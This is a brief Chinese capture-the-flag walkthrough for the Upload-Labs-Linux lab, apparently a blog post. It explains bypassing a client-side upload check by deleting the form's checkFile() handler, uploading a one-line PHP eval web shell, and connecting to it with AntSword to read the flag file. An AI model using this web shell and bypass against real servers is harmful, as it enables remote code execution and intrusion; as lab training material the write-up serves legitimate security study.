发布于 

CTF:Upload-Labs-Linux

# 题目预览:

# 解决方法

  1. 开控制台
  2. 关闭 javascript

    设置 - 偏好设置 - 调试程序
    删除 onsubmit="return.checkFile()"

  3. 新建一个文件里面写入 <?php @eval($_POST['123']);?>
  4. 后缀名改为 php 上传到网站,显示出图片后右键复制链接。
  5. 打开 antsword,add 一个 url 地址为图片链接,密码为 123,加密 base64.
  6. 点击链接就能发现根目录有个 flag 文件了。